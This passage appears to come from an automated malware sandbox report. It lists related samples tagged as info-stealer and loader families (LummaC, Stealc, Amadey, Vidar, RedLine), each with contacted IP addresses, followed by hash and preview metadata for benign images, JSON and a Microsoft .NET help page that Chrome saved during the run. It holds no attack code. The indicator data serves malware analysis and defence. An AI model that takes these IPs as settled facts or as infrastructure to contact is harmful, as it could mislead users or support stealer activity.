                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                  • 172.66.0.235
                                                                                                                                                                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, CryptbotBrowse
                                                                                                                                                                                  • 185.215.113.43
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  28a2c9bd18a11de089ef85a160da29e4Q460725_8952397_6525_PDF.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 23.218.208.109
                                                                                                                                                                                  • 20.12.23.50
                                                                                                                                                                                  21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 23.218.208.109
                                                                                                                                                                                  • 20.12.23.50
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 23.218.208.109
                                                                                                                                                                                  • 20.12.23.50
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 23.218.208.109
                                                                                                                                                                                  • 20.12.23.50
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 23.218.208.109
                                                                                                                                                                                  • 20.12.23.50
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 23.218.208.109
                                                                                                                                                                                  • 20.12.23.50
                                                                                                                                                                                  n5QCsKJ0CP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 23.218.208.109
                                                                                                                                                                                  • 20.12.23.50
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 23.218.208.109
                                                                                                                                                                                  • 20.12.23.50
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 23.218.208.109
                                                                                                                                                                                  • 20.12.23.50
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 23.218.208.109
                                                                                                                                                                                  • 20.12.23.50
                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  Aura.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  No context
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):35005
                                                                                                                                                                                  Entropy (8bit):7.980061050467981
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                  MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                  SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                  SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                  SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                  Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13842
                                                                                                                                                                                  Entropy (8bit):7.802399161550213
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                  MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                  SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                  SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                  SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                  Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4897
                                                                                                                                                                                  Entropy (8bit):4.8007377074457604
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                  MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                  SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                  SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                  SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                  Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):47062
                                                                                                                                                                                  Entropy (8bit):5.016115705165622
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                  MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                  SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                  SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                  SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                  Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):3130
                                                                                                                                                                                  Entropy (8bit):4.790069981348324
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                  MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                  SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                  SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                  SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                  Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18367
                                                                                                                                                                                  Entropy (8bit):7.7772261735974215
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                  MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                  SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                  SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                  SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13339
                                                                                                                                                                                  Entropy (8bit):7.683569563478597
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                  MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                  SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                  SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                  SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):18367
                                                                                                                                                                                  Entropy (8bit):7.7772261735974215
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                  MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                  SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                  SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                  SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1154
                                                                                                                                                                                  Entropy (8bit):4.59126408969148
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                  MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                  SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                  SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                  SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3130
                                                                                                                                                                                  Entropy (8bit):4.790069981348324
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                  MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                  SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                  SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                  SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15427
                                                                                                                                                                                  Entropy (8bit):7.784472070227724
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                  MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                  SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                  SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                  SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):464328
                                                                                                                                                                                  Entropy (8bit):5.074669864961383
                                                                                                                                                                                  Encrypted:false
